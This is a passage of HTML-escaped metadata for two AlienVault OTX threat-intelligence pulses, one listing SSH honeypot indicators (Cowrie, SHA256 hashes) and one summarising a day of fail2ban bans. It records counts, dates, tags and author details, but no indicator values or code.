nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;5,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5eeed43b02aa18a3eba2a52f',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'FileHash-SHA256':&nbsp;3},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-21T03:01:25.683000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'274&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'SSH&nbsp;-&nbsp;US&nbsp;Honeypot&nbsp;IoCs&nbsp;2020-06-20',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;266,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['honeypot',&nbsp;'ssh',&nbsp;'cowrie'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-06-20T23:05:03.321000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5eee961fe332600451ce0485',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-20T23:04:17.461000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'274&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-06-20&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'dce5352e-74ce-432e-8c57-d9819a9a6a79',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp